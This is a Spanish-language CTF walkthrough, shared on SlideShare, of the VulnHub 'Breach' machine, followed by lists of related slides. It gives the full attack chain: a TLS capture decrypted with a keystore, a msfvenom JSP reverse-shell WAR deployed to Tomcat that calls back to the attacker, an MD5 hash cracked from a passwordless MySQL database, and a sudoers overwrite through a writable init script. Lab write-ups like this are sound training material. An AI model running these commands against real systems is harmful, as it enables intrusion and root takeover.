SlideShare una empresa de Scribd logo

Solucion reto breach

R
Roberto Garcia Amoriz

Walkthrough of Breach game in spanish

Tecnología
1 de 13
Descargar para leer sin conexión
Me he picado con esto de los retos, así que he decidido buscar otra máquina para darle cera. En este caso la máquina se llama Breach y es el mismo formato, un OVA que puedes montar rápidamente en VirtualBox. Lo primero que nos dice en el fichero “readme” es que la máquina ya viene con una IP prefijada y que debes ponerla en host only (“adaptador solo anfitrión” en VirtualBox si está en castellano) y obviamente, lo mismo para la máquina que uses para atacar. En mi caso una Kali en la que configuro así. ifconfig eth0 192.168.110.141 netmask 255.255.255.0 Y hago un ping a la IP de la máquina breach para ver que existe comunicación. Pues ya podemos empezar. Lo primero siempre es lanzar un nmap para ver que puertos tiene abiertos y que servicios corriendo. La máquina tiene abiertos chopocientosmil puertos -de hecho se ha pegado más de 20 min escaneando- pero veo que el puerto 80 está disponible… veamos que esconde xD.
Lo que sale es un señor tomando una kaipirinha o algo similar y un texto que nos dice, resumiendo, que la empresa Initech ha sido comprometida y un empleado descontento les ha dejado un regalito. Si miramos como de costumbre el código, en rojo veo una cadena que me llama poderosamente la atención. Vamos a pasarla por el decoder de base64 de Burp a ver que nos devuelve. Estaba “doblemente encodeado”, pero al final aparece algo, tiene pinta de ser un juego de usuario contraseña. pgibbons:damnitfeel$goodtobeagang$ta Seguimos con las buenas costumbres y le damos caña con el spider. Y resulta que vamos encontrando cosas. De momento tenemos un frontal con un cms en el que existe un login. Probemos por si acaso con las credenciales que hemos obtenido. Pues parece que ha habido suerte a la primera, estamos dentro. En la siguiente imagen se puede ver que hay 3 mensajes. Vamos a ver si arrojan algo de luz.
Pues esta vez estoy teniendo suerte. Accedo a la ruta que comenta el colega y… Tenemos un fichero descargado y por lo que dice el correo parece ser que es un certificado. Vuelvo a mirar los correos y veo uno que me hace gracia… Pinchando en “banners” en el menú de la izquierda, me encuentro con un listado de directorios. Pues nada, nos toca ir abriendo uno a uno a ver que podemos sacar. Vistos todos, a priori parece que no hay nada importante, no obstante me quedo con la ruta por si hubiese que volver. Como nota, sabemos que corre un Apache 2.4.7 xD. http://192.168.110.140/impresscms/modules/banners/ Lo mismo me ocurre al acceder a “profile”.
Me topo con una ruta en la que puedo descargar un fichero .swf (flash) y que obviamente me guardo por si acaso. Tras probar a abrir el fichero y a pasarlo a otros formatos de video sin éxito (parece que o está corrupto o no es en realidad un .swf) decido dejarlo de momento para no perder más tiempo. Sigo buscando y abriendo todos los links que veo, hasta que encuentro un fichero en el perfil de Peter.
Al entrar me da acceso a un fichero .pcap que descargo. Si leemos el correo nos dice que no puede leer el .pcap a pesar de sus conocimientos de C|EH jajaja… Al abrir el fichero .pac con Wireshark, lo único que se ve es mogollón de datos cifrados. Está claro que el contenido está cifrado y que el fichero que descargamos al princio es la key. En este punto me vuelvo bastante loco porque no sé cómo seguir, así que a buscar info en google de como importar a wireshark el certificado. Resulta que el fichero descargado es un repositorio de certificados de seguridad en Java… no comment xD. Después de mucho, pero mucho buscar, encuentro un artículo -en perfecto inglés- de cómo hacer el proceso (esto de nivel medio no tiene nada xD). En realidad no de cómo hacer el proceso, si no de la herramienta necesaria para que puedas hacerlo. Después de leer el manual de la herramienta keytool y probar 84.976 veces, di con ello.
keytool -importkeystore -srckeystore keystore -destkeystore keystore.p12 -deststoretype PKCS12 -srcalias tomcat -deststorepass tomcat -destkeypass tomcat La contraseña es tomcat, ya nos daba la respuesta en el mail jeje. Total, que todo esto solo era para crea un fichero .p12 y ahora tenemos que sacar el certificado. Ea, a buscar otro rato en google. Después de más de dos horas investigando y probando comandos en la consola, el resultado es este. keytool -importkeystore -srckeystore keystore -destkeystore keystore.p12 -deststoretype PKCS12 -srcalias tomcat -deststorepass tomcat -destkeypass tomcat (pass: tomcat) openssl pkcs12 -in keystore.p12 -out key.pem (en todas las preguntas pass: tomcat) Ahora sí, volvemos a abrir Wireskhar, cargamos el .pcap y vamos a “edit -> preferences -> protocols -> ssl y ahí agregamos el certificado con los parámetros que vemos en la imagen.
Seguro que desde Wireshark se pueden ver las credenciales, pero ahora no atino y tardo menos haciéndolo desde Burp. Hemos visto que aparece una ruta, /_M@nag3Me/html/ y unas credenciales: tomcat:Tt5D8F(#!*u=G)4m7zB Voy a verificar que hay en ese puerto, aunque ya con la ruta creo que queda claro. Revisando Wireskhark veo otro paquete que me llama la atención. Y viendo la respuesta del servidor, me da la impresión de que ha habido una subida de webshell y una ejecución de comandos. No soy un experto, pero a las pruebas me remito xD.
Me ha costado bastante llegar hasta aquí, de hecho mucho más de lo que esperaba, me ha retrasado muchísimo la parte del certificado, hay que darle un 10 al creador de la máquina. Si accedo a https://192.168.110.140:8443/_M@nag3Me/html/ me salta un login. Vamos a probar a meter el juego de user/password que he obtenido con WiresHark. Otra vez atascado , estoy más perdido que un cangrejo una pista de tenis. Llegado este punto estoy por tirar la toalla y pasar de esta máquina, llevo muchas horas perdidas y no sé qué hacer… Quizá si los atacantes subieron una webshell yo podría hacer lo mismo. Manos a la obra. Esta vez uso Burp con la extensión CO2 para crear una webshell para subirla al Tomcat. msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.110.142 LPORT=2222 -f war > shellok.war Una vez que la tenemos creada, debemos subirla a la parte de tomcat que cogimos con Wireshark. Una vez allí, en la parte que pone “WAR file to deploy” le damos a browse, vamos al directorio donde hemos creado la webshell y le damos a aceptar y a “deploy”. Podemos verlo en la siguiente imagen.
Automáticamente nos la “arranca” (si nos fijamos en la imagen anterior, se ve que “start” no está subrayado). Vamos a la máquina Kali y lo ejecutamos netcat con los parámetros -lvp. Se quedará esperando y solo nos queda llamarla desde IP/shellok. Bien, pues ya tenemos la webshell funcionando. Veamos qué podemos hacer. De momento, igual que hicieron los atacantes, ejecutamos el comando “id” y vemos lo siguiente. Como hicimos en la máquina de Mr Robot, nos hacemos una Shell “mejorada”. Se supone que podré escalar privilegios con la cuenta de “blumberg” o con la de “milton”, pero claro, donde está la contraseña… De nuevo estoy perdido, llevo demasiadas horas con esta máquina como para dejarlo ahora, así que lo mejor será repasar otra vez todo desde el principio. Y es que cuando abrí por primera vez la web por la IP 192.168.110.140 lo único que había era la imagen del colega en la playa. Entonces me vino la luz y se me ocurrió que quizá hubiese algún tipo de información en la imagen a modo de stegano.
Mi gozo en un pozo!! Que leches pasa aquí, que me estoy dejando?? Revisemos el código de la página principal. Si es que no hay nada como leer! Lo tenía delante de mis ojos. Revisando cada link, lo único que se ven son dos imágenes, la vuelta a la web principal y el acceso a CMS. ¿Será la contraseña el nombre de la grapadora? Demasiado fácil, veamos. Como suponía no hay nada… probaré de nuevo las imágenes con “exiftool”
Pues nada, ni la una ni la otra, esto ya roza lo irracional xD. Mierda! Resulta que pinchando en la imagen de http://192.168.110.140/initech.html aparece otra imagen. ¿Será esta? Tiene buena pinta, esta tiene un comentario con la palabra “coffeestains”. Vamos a probarlo con las cuentas a ver… Ohhhhhhhhh si!!!! Veamos qué es lo último que hizo el usuario
Veamos que tiene el script. Pues parece que borra la información cada 3 minutos. Vamos a ver que hay en la carpeta Después de mirar a fondo todos los directorios y sus ficheros creo que no hay nada que merezca la pena. Madre mía, esto es desesperante, voy a ver si puedo acceder con el otro usuario por si hubiese algo que ver. Pues nada, después de probar las contraseñas que he obtenido, no tengo nada. Veamos que hay corriendo en la máquina con un ps aux por si revelase algo. Lo único que me llama la atención y que pueda cuadrar es el servicio de mysql. Después de probar de nuevo todas las credenciales y palabras que se me han ocurrido, el gato ha pasado por encima del teclado y resulta que no tiene contraseña (el mismo gato que pisa siempre la comilla xD). Gracias a mi querido Mario y sus clases de mysql con una pequeña consulta… Qué fácil es todo cuando estás dentro del motor de la bases de datos jeje. Ya tenemos la pass hasheada de milton: 6450d89bd3aff1d893b85d3ad65d2ec2
Crakeamos ese hash (md5) y obtenemos como resultado “thelaststraw” Resulta que milton es miembro del grupo “adm” y rebuscando en modo desesperación “ON” encontré un script que se ejecuta en el “init.d” y el usuario milton es capaz de escribirlo. Gracias a mi compañero Rodri que me dijo como poder escribir dentro. Con: echo "echo 'milton ALL=(ALL) ALL' > /etc/sudoers" > /etc/init.d/portly.sh Nos convertimos en root. He de reconocer que en esta parte hice una pequeña trampa, tuve que reiniciar la máquina de manera manual porque desde la kali era incapaz. Una vez reiniciada la máquina, y ya estando milton en el fichero sudoers, nos hacemos root con “sudo su”. El final ha sido lo más fácil, para encontrar el flag solo tenías que hacer un ls -lha y un cat al fichero “.flag.txt”. El problema ha sido llegar aquí xD. Agradecimientos:  A Rodri por darme luz cuando estaba a punto de dejarlo.  Al creador de la máquina @mrb3n813 (aunque no sé si darle una abrazo o 2 yoyas xD). Enlaces de ayuda: https://www.vulnhub.com/entry/breach-1,152/ https://pentestlab.wordpress.com/2012/08/26/using-metasploit-to-create-a-war-backdoor/ https://www.tbs-certificates.co.uk/FAQ/en/627.html#volet http://packetpushers.net/using-wireshark-to-decode-ssltls-packets/ *Nota: Para mi esta máquina ha sido muy muy difícil, eso sí, lo que he aprendido en consecuencia, creo que merece la pena xD.

Recomendados

Solución al reto the necromancer
Solución al reto the necromancerSolución al reto the necromancer
Solución al reto the necromancerRoberto Garcia Amoriz
 
Solución reto null byte
Solución reto null byteSolución reto null byte
Solución reto null byteRoberto Garcia Amoriz
 
Solucion reto mr robot
Solucion reto mr robotSolucion reto mr robot
Solucion reto mr robotRoberto Garcia Amoriz
 
Reto spyder sec
Reto spyder secReto spyder sec
Reto spyder secRoberto Garcia Amoriz
 
CTF Brainpan
CTF BrainpanCTF Brainpan
CTF BrainpanDiego Ramírez González
 
Solución reto the wall
Solución reto the wallSolución reto the wall
Solución reto the wallRoberto Garcia Amoriz
 
Batch
BatchBatch
Batchalan moreno
 
Templix Linux Y Mi Vecina
Templix Linux Y Mi VecinaTemplix Linux Y Mi Vecina
Templix Linux Y Mi VecinaRoberto Lopez
 

Recomendados

Solución al reto the necromancer
Solución al reto the necromancerSolución al reto the necromancer
Solución al reto the necromancerRoberto Garcia Amoriz
 
Solución reto null byte
Solución reto null byteSolución reto null byte
Solución reto null byteRoberto Garcia Amoriz
 
Solucion reto mr robot
Solucion reto mr robotSolucion reto mr robot
Solucion reto mr robotRoberto Garcia Amoriz
 
Reto spyder sec
Reto spyder secReto spyder sec
Reto spyder secRoberto Garcia Amoriz
 
CTF Brainpan
CTF BrainpanCTF Brainpan
CTF BrainpanDiego Ramírez González
 
Solución reto the wall
Solución reto the wallSolución reto the wall
Solución reto the wallRoberto Garcia Amoriz
 
Batch
BatchBatch
Batchalan moreno
 
Templix Linux Y Mi Vecina
Templix Linux Y Mi VecinaTemplix Linux Y Mi Vecina
Templix Linux Y Mi VecinaRoberto Lopez
 
Practicas hackx crack_06
Practicas hackx crack_06Practicas hackx crack_06
Practicas hackx crack_06Aldo Jamir Leone Icaza
 
Wep wpa wpa2-cracking
Wep wpa wpa2-crackingWep wpa wpa2-cracking
Wep wpa wpa2-crackingToni Gonzalez Burgueño
 
Tutorial de instalación de vnc en ubuntu 12.04
Tutorial de instalación de vnc en ubuntu 12.04Tutorial de instalación de vnc en ubuntu 12.04
Tutorial de instalación de vnc en ubuntu 12.04Nestux Alfonso Rincón Garcia
 
Manual FlashFXP by Dj Keller
Manual FlashFXP by Dj KellerManual FlashFXP by Dj Keller
Manual FlashFXP by Dj Kellerdegarden
 
Manual de Lenguaje Batch
Manual de Lenguaje BatchManual de Lenguaje Batch
Manual de Lenguaje BatchMauricio Melo
 
Bash Ransomware
Bash RansomwareBash Ransomware
Bash RansomwareJosé Moreno
 
Vb script hx-c-wd
Vb script hx-c-wdVb script hx-c-wd
Vb script hx-c-wdDiego Caceres
 
Visual basic script v1 wd
Visual basic script v1 wdVisual basic script v1 wd
Visual basic script v1 wdRomny Villegas
 
Tutorialwifislax
TutorialwifislaxTutorialwifislax
Tutorialwifislaxlupita
 
Kt condicionales en php
Kt condicionales en phpKt condicionales en php
Kt condicionales en phpKtziitha Lendaa
 
Condicionales
CondicionalesCondicionales
CondicionalesKtziitha Lendaa
 
Art hack web-v1-4
Art hack web-v1-4Art hack web-v1-4
Art hack web-v1-4esmartcrimt
 
Xss con javascript
Xss con javascriptXss con javascript
Xss con javascriptAlan Resendiz
 
Chap 15gpin
Chap 15gpinChap 15gpin
Chap 15gpinAlvaro Pino
 
Como instalar Prolog en Windows
Como instalar Prolog en WindowsComo instalar Prolog en Windows
Como instalar Prolog en WindowsCesarMartinez474
 
Desde el DVR hasta la cocina
Desde el DVR hasta la cocinaDesde el DVR hasta la cocina
Desde el DVR hasta la cocinaEfren Diaz Gomez
 
альтернативные источники
альтернативные источникиальтернативные источники
альтернативные источникиЖанибек Мухаметкалиев
 
NemnogoBiznes
NemnogoBiznesNemnogoBiznes
NemnogoBiznesАртем Russia
 
Besar dan kecil itu tergantung pandangan
Besar dan kecil itu tergantung pandanganBesar dan kecil itu tergantung pandangan
Besar dan kecil itu tergantung pandanganhenry jaya teddy
 
AbbottProposal
AbbottProposalAbbottProposal
AbbottProposalLogan Abbott, PharmD
 
Aambal Advertising Agency
Aambal Advertising AgencyAambal Advertising Agency
Aambal Advertising AgencyAambal Advertising Chennai
 
Portafolio diagnóstico semana 1 REA
Portafolio diagnóstico semana 1 REAPortafolio diagnóstico semana 1 REA
Portafolio diagnóstico semana 1 REAdiegoarmandonava
 

Más contenido relacionado

La actualidad más candente

Manual FlashFXP by Dj Keller
Manual FlashFXP by Dj KellerManual FlashFXP by Dj Keller
Manual FlashFXP by Dj Kellerdegarden
 
Manual de Lenguaje Batch
Manual de Lenguaje BatchManual de Lenguaje Batch
Manual de Lenguaje BatchMauricio Melo
 
Visual basic script v1 wd
Visual basic script v1 wdVisual basic script v1 wd
Visual basic script v1 wdRomny Villegas
 
Tutorialwifislax
TutorialwifislaxTutorialwifislax
Tutorialwifislaxlupita
 
Art hack web-v1-4
Art hack web-v1-4Art hack web-v1-4
Art hack web-v1-4esmartcrimt
 
Como instalar Prolog en Windows
Como instalar Prolog en WindowsComo instalar Prolog en Windows
Como instalar Prolog en WindowsCesarMartinez474
 
Desde el DVR hasta la cocina
Desde el DVR hasta la cocinaDesde el DVR hasta la cocina
Desde el DVR hasta la cocinaEfren Diaz Gomez
 

La actualidad más candente (16)

Practicas hackx crack_06
Practicas hackx crack_06Practicas hackx crack_06
Practicas hackx crack_06
 
Wep wpa wpa2-cracking
Wep wpa wpa2-crackingWep wpa wpa2-cracking
Wep wpa wpa2-cracking
 
Tutorial de instalación de vnc en ubuntu 12.04
Tutorial de instalación de vnc en ubuntu 12.04Tutorial de instalación de vnc en ubuntu 12.04
Tutorial de instalación de vnc en ubuntu 12.04
 
Manual FlashFXP by Dj Keller
Manual FlashFXP by Dj KellerManual FlashFXP by Dj Keller
Manual FlashFXP by Dj Keller
 
Manual de Lenguaje Batch
Manual de Lenguaje BatchManual de Lenguaje Batch
Manual de Lenguaje Batch
 
Bash Ransomware
Bash RansomwareBash Ransomware
Bash Ransomware
 
Vb script hx-c-wd
Vb script hx-c-wdVb script hx-c-wd
Vb script hx-c-wd
 
Visual basic script v1 wd
Visual basic script v1 wdVisual basic script v1 wd
Visual basic script v1 wd
 
Tutorialwifislax
TutorialwifislaxTutorialwifislax
Tutorialwifislax
 
Kt condicionales en php
Kt condicionales en phpKt condicionales en php
Kt condicionales en php
 
Condicionales
CondicionalesCondicionales
Condicionales
 
Art hack web-v1-4
Art hack web-v1-4Art hack web-v1-4
Art hack web-v1-4
 
Xss con javascript
Xss con javascriptXss con javascript
Xss con javascript
 
Chap 15gpin
Chap 15gpinChap 15gpin
Chap 15gpin
 
Como instalar Prolog en Windows
Como instalar Prolog en WindowsComo instalar Prolog en Windows
Como instalar Prolog en Windows
 
Desde el DVR hasta la cocina
Desde el DVR hasta la cocinaDesde el DVR hasta la cocina
Desde el DVR hasta la cocina
 

Destacado

Besar dan kecil itu tergantung pandangan
Besar dan kecil itu tergantung pandanganBesar dan kecil itu tergantung pandangan
Besar dan kecil itu tergantung pandanganhenry jaya teddy
 
Portafolio diagnóstico semana 1 REA
Portafolio diagnóstico semana 1 REAPortafolio diagnóstico semana 1 REA
Portafolio diagnóstico semana 1 REAdiegoarmandonava
 
Daniel Alvarez Resume 1
Daniel Alvarez Resume 1Daniel Alvarez Resume 1
Daniel Alvarez Resume 1Daniel Alvarez
 
Significance of a Robust AML Risk Assessment Process for FIs and RIAs
Significance of a Robust AML Risk Assessment Process for FIs and RIAsSignificance of a Robust AML Risk Assessment Process for FIs and RIAs
Significance of a Robust AML Risk Assessment Process for FIs and RIAsAML Audit
 
Quick Reference Guide to BSA/AML Risk Assessment
Quick Reference Guide to BSA/AML Risk AssessmentQuick Reference Guide to BSA/AML Risk Assessment
Quick Reference Guide to BSA/AML Risk AssessmentMayank Johri
 

Destacado (10)

альтернативные источники
альтернативные источникиальтернативные источники
альтернативные источники
 
NemnogoBiznes
NemnogoBiznesNemnogoBiznes
NemnogoBiznes
 
Besar dan kecil itu tergantung pandangan
Besar dan kecil itu tergantung pandanganBesar dan kecil itu tergantung pandangan
Besar dan kecil itu tergantung pandangan
 
AbbottProposal
AbbottProposalAbbottProposal
AbbottProposal
 
Aambal Advertising Agency
Aambal Advertising AgencyAambal Advertising Agency
Aambal Advertising Agency
 
Portafolio diagnóstico semana 1 REA
Portafolio diagnóstico semana 1 REAPortafolio diagnóstico semana 1 REA
Portafolio diagnóstico semana 1 REA
 
Daniel Alvarez Resume 1
Daniel Alvarez Resume 1Daniel Alvarez Resume 1
Daniel Alvarez Resume 1
 
Significance of a Robust AML Risk Assessment Process for FIs and RIAs
Significance of a Robust AML Risk Assessment Process for FIs and RIAsSignificance of a Robust AML Risk Assessment Process for FIs and RIAs
Significance of a Robust AML Risk Assessment Process for FIs and RIAs
 
business_bjarke_02-4
business_bjarke_02-4business_bjarke_02-4
business_bjarke_02-4
 
Quick Reference Guide to BSA/AML Risk Assessment
Quick Reference Guide to BSA/AML Risk AssessmentQuick Reference Guide to BSA/AML Risk Assessment
Quick Reference Guide to BSA/AML Risk Assessment
 

Similar a Solucion reto breach

Wep wpa wpa2-cracking
Wep wpa wpa2-crackingWep wpa wpa2-cracking
Wep wpa wpa2-crackingmasterhack
 
Realidad Aumentada 01 documentacion tapir
Realidad Aumentada 01 documentacion tapirRealidad Aumentada 01 documentacion tapir
Realidad Aumentada 01 documentacion tapirAgustín Hv
 
Write up desafio 20 eset
Write up desafio 20 esetWrite up desafio 20 eset
Write up desafio 20 esetjeysonh
 
Backdoor via inyeccion
Backdoor via inyeccionBackdoor via inyeccion
Backdoor via inyeccionq3rv0
 
(Configuración de hardware y software de una red que consta de 7 equipos)
(Configuración de hardware y software de una red que consta de 7 equipos)(Configuración de hardware y software de una red que consta de 7 equipos)
(Configuración de hardware y software de una red que consta de 7 equipos)azu-r-g-c
 
Flisol Airacrack-ng
Flisol Airacrack-ng Flisol Airacrack-ng
Flisol Airacrack-ng Web Developer
 
Manual de hacking basico por taskkill#3
Manual de hacking basico por taskkill#3Manual de hacking basico por taskkill#3
Manual de hacking basico por taskkill#3Brat Stell
 
INSTALACION DE CENTOS Y OPENSSL
INSTALACION DE CENTOS Y OPENSSLINSTALACION DE CENTOS Y OPENSSL
INSTALACION DE CENTOS Y OPENSSLEdson Ortega
 

Similar a Solucion reto breach (20)

Manual de uso_de_squid
Manual de uso_de_squidManual de uso_de_squid
Manual de uso_de_squid
 
Ejercicio 1
Ejercicio 1Ejercicio 1
Ejercicio 1
 
Wep wpa wpa2-cracking
Wep wpa wpa2-crackingWep wpa wpa2-cracking
Wep wpa wpa2-cracking
 
Hackthissite
HackthissiteHackthissite
Hackthissite
 
CTF Hackademic.RTB2
CTF Hackademic.RTB2CTF Hackademic.RTB2
CTF Hackademic.RTB2
 
Hackeo y cracking de wifi
Hackeo y cracking de wifiHackeo y cracking de wifi
Hackeo y cracking de wifi
 
REDES INALAMBRICAS
REDES INALAMBRICASREDES INALAMBRICAS
REDES INALAMBRICAS
 
Realidad Aumentada 01 documentacion tapir
Realidad Aumentada 01 documentacion tapirRealidad Aumentada 01 documentacion tapir
Realidad Aumentada 01 documentacion tapir
 
Tutorial Empaquetador Para La BitáCora
Tutorial Empaquetador Para La BitáCoraTutorial Empaquetador Para La BitáCora
Tutorial Empaquetador Para La BitáCora
 
Airodump
AirodumpAirodump
Airodump
 
Empezando con mac
Empezando con macEmpezando con mac
Empezando con mac
 
Write up desafio 20 eset
Write up desafio 20 esetWrite up desafio 20 eset
Write up desafio 20 eset
 
Backdoor via inyeccion
Backdoor via inyeccionBackdoor via inyeccion
Backdoor via inyeccion
 
Desencriptar claves wap
Desencriptar claves wapDesencriptar claves wap
Desencriptar claves wap
 
(Configuración de hardware y software de una red que consta de 7 equipos)
(Configuración de hardware y software de una red que consta de 7 equipos)(Configuración de hardware y software de una red que consta de 7 equipos)
(Configuración de hardware y software de una red que consta de 7 equipos)
 
Flisol Airacrack-ng
Flisol Airacrack-ng Flisol Airacrack-ng
Flisol Airacrack-ng
 
Manual de hacking basico por taskkill#3
Manual de hacking basico por taskkill#3Manual de hacking basico por taskkill#3
Manual de hacking basico por taskkill#3
 
Xammp
XammpXammp
Xammp
 
INSTALACION DE CENTOS Y OPENSSL
INSTALACION DE CENTOS Y OPENSSLINSTALACION DE CENTOS Y OPENSSL
INSTALACION DE CENTOS Y OPENSSL
 
Wifislax tutorial
Wifislax tutorial Wifislax tutorial
Wifislax tutorial
 

Último

definicion segun autores de matemáticas educativa
definicion segun autores de matemáticas educativadefinicion segun autores de matemáticas educativa
definicion segun autores de matemáticas educativaAdrianaMartnez618894
 
International Women's Day Sucre 2024 (IWD)
International Women's Day Sucre 2024 (IWD)International Women's Day Sucre 2024 (IWD)
International Women's Day Sucre 2024 (IWD)GDGSucre
 
Crear un recurso multimedia. Maricela_Ponce_DomingoM1S3AI6-1.pptx
Crear un recurso multimedia. Maricela_Ponce_DomingoM1S3AI6-1.pptxCrear un recurso multimedia. Maricela_Ponce_DomingoM1S3AI6-1.pptx
Crear un recurso multimedia. Maricela_Ponce_DomingoM1S3AI6-1.pptxNombre Apellidos
 
Hernandez_Hernandez_Practica web de la sesion 12.pptx
Hernandez_Hernandez_Practica web de la sesion 12.pptxHernandez_Hernandez_Practica web de la sesion 12.pptx
Hernandez_Hernandez_Practica web de la sesion 12.pptxJOSEMANUELHERNANDEZH11
 
Medidas de formas, coeficiente de asimetría y coeficiente de curtosis.pptx
Medidas de formas, coeficiente de asimetría y coeficiente de curtosis.pptxMedidas de formas, coeficiente de asimetría y coeficiente de curtosis.pptx
Medidas de formas, coeficiente de asimetría y coeficiente de curtosis.pptxaylincamaho
 
ejercicios pseint para aprogramacion sof
ejercicios pseint para aprogramacion sofejercicios pseint para aprogramacion sof
ejercicios pseint para aprogramacion sofJuancarlosHuertasNio1
 
PARTES DE UN OSCILOSCOPIO ANALOGICO .pdf
PARTES DE UN OSCILOSCOPIO ANALOGICO .pdfPARTES DE UN OSCILOSCOPIO ANALOGICO .pdf
PARTES DE UN OSCILOSCOPIO ANALOGICO .pdfSergioMendoza354770
 
KELA Presentacion Costa Rica 2024 - evento Protégeles
KELA Presentacion Costa Rica 2024 - evento ProtégelesKELA Presentacion Costa Rica 2024 - evento Protégeles
KELA Presentacion Costa Rica 2024 - evento ProtégelesFundación YOD YOD
 
Presentación inteligencia artificial en la actualidad
Presentación inteligencia artificial en la actualidadPresentación inteligencia artificial en la actualidad
Presentación inteligencia artificial en la actualidadMiguelAngelVillanuev48
 
trabajotecologiaisabella-240424003133-8f126965.pdf
trabajotecologiaisabella-240424003133-8f126965.pdftrabajotecologiaisabella-240424003133-8f126965.pdf
trabajotecologiaisabella-240424003133-8f126965.pdfIsabellaMontaomurill
 
R1600G CAT Variables de cargadores en mina
R1600G CAT Variables de cargadores en minaR1600G CAT Variables de cargadores en mina
R1600G CAT Variables de cargadores en minaarkananubis
 
Plan de aula informatica segundo periodo.docx
Plan de aula informatica segundo periodo.docxPlan de aula informatica segundo periodo.docx
Plan de aula informatica segundo periodo.docxpabonheidy28
 
Cortes-24-de-abril-Tungurahua-3 año 2024
Cortes-24-de-abril-Tungurahua-3 año 2024Cortes-24-de-abril-Tungurahua-3 año 2024
Cortes-24-de-abril-Tungurahua-3 año 2024GiovanniJavierHidalg
 
tics en la vida cotidiana prepa en linea modulo 1.pptx
tics en la vida cotidiana prepa en linea modulo 1.pptxtics en la vida cotidiana prepa en linea modulo 1.pptx
tics en la vida cotidiana prepa en linea modulo 1.pptxazmysanros90
 
dokumen.tips_36274588-sistema-heui-eui.ppt
dokumen.tips_36274588-sistema-heui-eui.pptdokumen.tips_36274588-sistema-heui-eui.ppt
dokumen.tips_36274588-sistema-heui-eui.pptMiguelAtencio10
 
ATAJOS DE WINDOWS. Los diferentes atajos para utilizar en windows y ser más e...
ATAJOS DE WINDOWS. Los diferentes atajos para utilizar en windows y ser más e...ATAJOS DE WINDOWS. Los diferentes atajos para utilizar en windows y ser más e...
ATAJOS DE WINDOWS. Los diferentes atajos para utilizar en windows y ser más e...FacuMeza2
 
La era de la educación digital y sus desafios
La era de la educación digital y sus desafiosLa era de la educación digital y sus desafios
La era de la educación digital y sus desafiosFundación YOD YOD
 
Redes direccionamiento y subredes ipv4 2024 .pdf
Redes direccionamiento y subredes ipv4 2024 .pdfRedes direccionamiento y subredes ipv4 2024 .pdf
Redes direccionamiento y subredes ipv4 2024 .pdfsoporteupcology
 
El uso de las TIC's en la vida cotidiana.
El uso de las TIC's en la vida cotidiana.El uso de las TIC's en la vida cotidiana.
El uso de las TIC's en la vida cotidiana.241514949
 
SalmorejoTech 2024 - Spring Boot <3 Testcontainers
SalmorejoTech 2024 - Spring Boot <3 TestcontainersSalmorejoTech 2024 - Spring Boot <3 Testcontainers
SalmorejoTech 2024 - Spring Boot <3 TestcontainersIván López Martín
 

Último (20)

definicion segun autores de matemáticas educativa
definicion segun autores de matemáticas educativadefinicion segun autores de matemáticas educativa
definicion segun autores de matemáticas educativa
 
International Women's Day Sucre 2024 (IWD)
International Women's Day Sucre 2024 (IWD)International Women's Day Sucre 2024 (IWD)
International Women's Day Sucre 2024 (IWD)
 
Crear un recurso multimedia. Maricela_Ponce_DomingoM1S3AI6-1.pptx
Crear un recurso multimedia. Maricela_Ponce_DomingoM1S3AI6-1.pptxCrear un recurso multimedia. Maricela_Ponce_DomingoM1S3AI6-1.pptx
Crear un recurso multimedia. Maricela_Ponce_DomingoM1S3AI6-1.pptx
 
Hernandez_Hernandez_Practica web de la sesion 12.pptx
Hernandez_Hernandez_Practica web de la sesion 12.pptxHernandez_Hernandez_Practica web de la sesion 12.pptx
Hernandez_Hernandez_Practica web de la sesion 12.pptx
 
Medidas de formas, coeficiente de asimetría y coeficiente de curtosis.pptx
Medidas de formas, coeficiente de asimetría y coeficiente de curtosis.pptxMedidas de formas, coeficiente de asimetría y coeficiente de curtosis.pptx
Medidas de formas, coeficiente de asimetría y coeficiente de curtosis.pptx
 
ejercicios pseint para aprogramacion sof
ejercicios pseint para aprogramacion sofejercicios pseint para aprogramacion sof
ejercicios pseint para aprogramacion sof
 
PARTES DE UN OSCILOSCOPIO ANALOGICO .pdf
PARTES DE UN OSCILOSCOPIO ANALOGICO .pdfPARTES DE UN OSCILOSCOPIO ANALOGICO .pdf
PARTES DE UN OSCILOSCOPIO ANALOGICO .pdf
 
KELA Presentacion Costa Rica 2024 - evento Protégeles
KELA Presentacion Costa Rica 2024 - evento ProtégelesKELA Presentacion Costa Rica 2024 - evento Protégeles
KELA Presentacion Costa Rica 2024 - evento Protégeles
 
Presentación inteligencia artificial en la actualidad
Presentación inteligencia artificial en la actualidadPresentación inteligencia artificial en la actualidad
Presentación inteligencia artificial en la actualidad
 
trabajotecologiaisabella-240424003133-8f126965.pdf
trabajotecologiaisabella-240424003133-8f126965.pdftrabajotecologiaisabella-240424003133-8f126965.pdf
trabajotecologiaisabella-240424003133-8f126965.pdf
 
R1600G CAT Variables de cargadores en mina
R1600G CAT Variables de cargadores en minaR1600G CAT Variables de cargadores en mina
R1600G CAT Variables de cargadores en mina
 
Plan de aula informatica segundo periodo.docx
Plan de aula informatica segundo periodo.docxPlan de aula informatica segundo periodo.docx
Plan de aula informatica segundo periodo.docx
 
Cortes-24-de-abril-Tungurahua-3 año 2024
Cortes-24-de-abril-Tungurahua-3 año 2024Cortes-24-de-abril-Tungurahua-3 año 2024
Cortes-24-de-abril-Tungurahua-3 año 2024
 
tics en la vida cotidiana prepa en linea modulo 1.pptx
tics en la vida cotidiana prepa en linea modulo 1.pptxtics en la vida cotidiana prepa en linea modulo 1.pptx
tics en la vida cotidiana prepa en linea modulo 1.pptx
 
dokumen.tips_36274588-sistema-heui-eui.ppt
dokumen.tips_36274588-sistema-heui-eui.pptdokumen.tips_36274588-sistema-heui-eui.ppt
dokumen.tips_36274588-sistema-heui-eui.ppt
 
ATAJOS DE WINDOWS. Los diferentes atajos para utilizar en windows y ser más e...
ATAJOS DE WINDOWS. Los diferentes atajos para utilizar en windows y ser más e...ATAJOS DE WINDOWS. Los diferentes atajos para utilizar en windows y ser más e...
ATAJOS DE WINDOWS. Los diferentes atajos para utilizar en windows y ser más e...
 
La era de la educación digital y sus desafios
La era de la educación digital y sus desafiosLa era de la educación digital y sus desafios
La era de la educación digital y sus desafios
 
Redes direccionamiento y subredes ipv4 2024 .pdf
Redes direccionamiento y subredes ipv4 2024 .pdfRedes direccionamiento y subredes ipv4 2024 .pdf
Redes direccionamiento y subredes ipv4 2024 .pdf
 
El uso de las TIC's en la vida cotidiana.
El uso de las TIC's en la vida cotidiana.El uso de las TIC's en la vida cotidiana.
El uso de las TIC's en la vida cotidiana.
 
SalmorejoTech 2024 - Spring Boot <3 Testcontainers
